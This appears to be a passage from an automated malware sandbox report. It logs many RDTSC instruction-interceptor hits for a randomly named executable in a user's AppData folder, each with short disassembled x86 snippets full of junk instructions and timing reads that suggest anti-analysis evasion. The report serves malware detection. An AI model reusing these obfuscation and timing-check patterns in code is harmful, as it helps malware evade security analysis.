0x0000007f push esi 0x00000080 push eax 0x00000081 push edx 0x00000082 pushad 0x00000083 popad 0x00000084 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 993176 second address: 993187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5828704A66h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 993187 second address: 99318B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9929F7 second address: 9929FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9929FC second address: 992A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 992A02 second address: 992A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 992A08 second address: 992A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 992B62 second address: 992B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5828704A71h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 992B86 second address: 992B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F5828CEC306h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 992B9A second address: 992BAE instructions: 0x00000000 rdtsc 0x00000002 je 00007F5828704A66h 0x00000008 js 00007F5828704A66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 992BAE second address: 992BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 992BB2 second address: 992BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 992BB8 second address: 992BC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F5828CEC306h 0x00000009 jbe 00007F5828CEC306h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 993009 second address: 99300D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99300D second address: 993016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 993016 second address: 99301B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 97B7F3 second address: 97B810 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828CEC318h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 97C762 second address: 97C766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 97E886 second address: 97E88A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 923EB2 second address: 923ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5828704A75h 0x0000000b jl 00007F5828704A66h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 923ED3 second address: 923EDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 923EDD second address: 923EE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96B28F second address: 96B296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 97F66B second address: 97F685 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jns 00007F5828704A6Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96B296 second address: 94BEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F5828CEC308h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D278Ch], ebx 0x00000028 call dword ptr [ebp+122D3874h] 0x0000002e push ecx 0x0000002f jmp 00007F5828CEC30Ah 0x00000034 pop ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F5828CEC30Bh 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f pop eax 0x00000040 jmp 00007F5828CEC318h 0x00000045 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96B7FA second address: 96B7FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96B7FE second address: 7BEA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 or dword ptr [ebp+1246E724h], eax 0x0000000e push dword ptr [ebp+122D1685h] 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F5828CEC308h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D24A2h], ecx 0x00000034 call dword ptr [ebp+122D389Ah] 0x0000003a pushad 0x0000003b jns 00007F5828CEC31Dh 0x00000041 xor eax, eax 0x00000043 add dword ptr [ebp+122D1A4Ch], ecx 0x00000049 mov edx, dword ptr [esp+28h] 0x0000004d pushad 0x0000004e mov dword ptr [ebp+122D1EFAh], edi 0x00000054 popad 0x00000055 mov dword ptr [ebp+122D29CCh], eax 0x0000005b js 00007F5828CEC312h 0x00000061 sub dword ptr [ebp+122D1F2Ch], ecx 0x00000067 mov esi, 0000003Ch 0x0000006c cld 0x0000006d add esi, dword ptr [esp+24h] 0x00000071 mov dword ptr [ebp+122D1A4Ch], esi 0x00000077 lodsw 0x00000079 jmp 00007F5828CEC318h 0x0000007e add eax, dword ptr [esp+24h] 0x00000082 clc 0x00000083 mov ebx, dword ptr [esp+24h] 0x00000087 stc 0x00000088 push eax 0x00000089 push esi 0x0000008a push eax 0x0000008b push edx 0x0000008c pushad 0x0000008d popad 0x0000008e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96BB0A second address: 96BB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], esi 0x00000009 sbb edx, 0589A7FFh 0x0000000f nop 0x00000010 je 00007F5828704A74h 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007F5828704A66h 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 98080F second address: 980834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC30Ch 0x00000009 popad 0x0000000a jg 00007F5828CEC308h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007F5828CEC306h 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 980834 second address: 98083E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96BDEC second address: 96BE5D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F5828CEC308h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 push 00000004h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007F5828CEC308h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 pushad 0x00000045 mov cl, B4h 0x00000047 mov edi, ebx 0x00000049 popad 0x0000004a nop 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e jng 00007F5828CEC306h 0x00000054 jmp 00007F5828CEC30Dh 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C556 second address: 96C55B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C5F5 second address: 96C60E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F5828CEC308h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007F5828CEC306h 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C60E second address: 96C618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C618 second address: 96C61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C61C second address: 96C69A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F5828704A68h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 pushad 0x00000027 jmp 00007F5828704A6Ch 0x0000002c mov edi, dword ptr [ebp+122D1A3Eh] 0x00000032 popad 0x00000033 mov edi, dword ptr [ebp+122D1994h] 0x00000039 pushad 0x0000003a mov eax, dword ptr [ebp+122D23CDh] 0x00000040 mov si, di 0x00000043 popad 0x00000044 lea eax, dword ptr [ebp+1247FFF4h] 0x0000004a jmp 00007F5828704A70h 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F5828704A72h 0x00000057 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C69A second address: 96C6E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F5828CEC30Eh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+124492F7h], eax 0x00000014 lea eax, dword ptr [ebp+1247FFB0h] 0x0000001a mov dx, 4AC5h 0x0000001e nop 0x0000001f jmp 00007F5828CEC315h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jnp 00007F5828CEC308h 0x0000002d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C6E2 second address: 96C6EC instructions: 0x00000000 rdtsc 0x00000002 js 00007F5828704A6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997657 second address: 99766F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5828CEC314h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997A93 second address: 997A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997A99 second address: 997AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997AA7 second address: 997AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997AAD second address: 997AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997AB3 second address: 997AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997AB7 second address: 997ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC310h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007F5828CEC30Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997D94 second address: 997D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997D9A second address: 997DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F5828CEC30Eh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997DB3 second address: 997DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 pushad 0x00000008 jc 00007F5828704A66h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99E155 second address: 99E159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99E159 second address: 99E1A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5828704A77h 0x0000000b jmp 00007F5828704A6Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5828704A77h 0x00000017 jmp 00007F5828704A6Ah 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99E1A8 second address: 99E1B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC30Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99CE36 second address: 99CE46 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5828704A66h 0x00000008 jo 00007F5828704A66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99CE46 second address: 99CE85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F5828CEC306h 0x00000012 jmp 00007F5828CEC319h 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99CFF5 second address: 99D045 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F5828704A72h 0x00000008 pop esi 0x00000009 pushad 0x0000000a je 00007F5828704A66h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jbe 00007F5828704A66h 0x00000018 jmp 00007F5828704A6Eh 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 push ecx 0x00000022 jmp 00007F5828704A72h 0x00000027 push edx 0x00000028 pop edx 0x00000029 pop ecx 0x0000002a push edi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99D199 second address: 99D1AA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5828CEC306h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99D353 second address: 99D37A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A79h 0x00000009 jmp 00007F5828704A6Ah 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99D5E0 second address: 99D5E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99D73E second address: 99D76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828704A74h 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5828704A6Ch 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99C87D second address: 99C885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99C885 second address: 99C8AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F5828704A66h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99C8AC second address: 99C8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A3E4C second address: 9A3E74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F5828704A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F5828704A79h 0x00000015 jmp 00007F5828704A73h 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A3E74 second address: 9A3E79 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 92E123 second address: 92E12B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A2B66 second address: 9A2B9F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007F5828CEC315h 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5828CEC30Eh 0x0000001a jnc 00007F5828CEC306h 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A2B9F second address: 9A2BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A2CE2 second address: 9A2CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A2CE8 second address: 9A2CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A2CED second address: 9A2D14 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5828CEC30Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jng 00007F5828CEC306h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5828CEC312h 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A2D14 second address: 9A2D50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5828704A75h 0x00000010 jmp 00007F5828704A6Dh 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A3117 second address: 9A312D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5828CEC306h 0x0000000a pop edi 0x0000000b pushad 0x0000000c jg 00007F5828CEC306h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A325A second address: 9A3260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A3260 second address: 9A3264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A3264 second address: 9A3279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A71h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A3279 second address: 9A3287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F5828CEC306h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A36E1 second address: 9A36E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A36E5 second address: 9A3706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC30Dh 0x00000007 ja 00007F5828CEC306h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F5828CEC306h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A3706 second address: 9A370A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A370A second address: 9A3728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F5828CEC312h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A3728 second address: 9A372C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
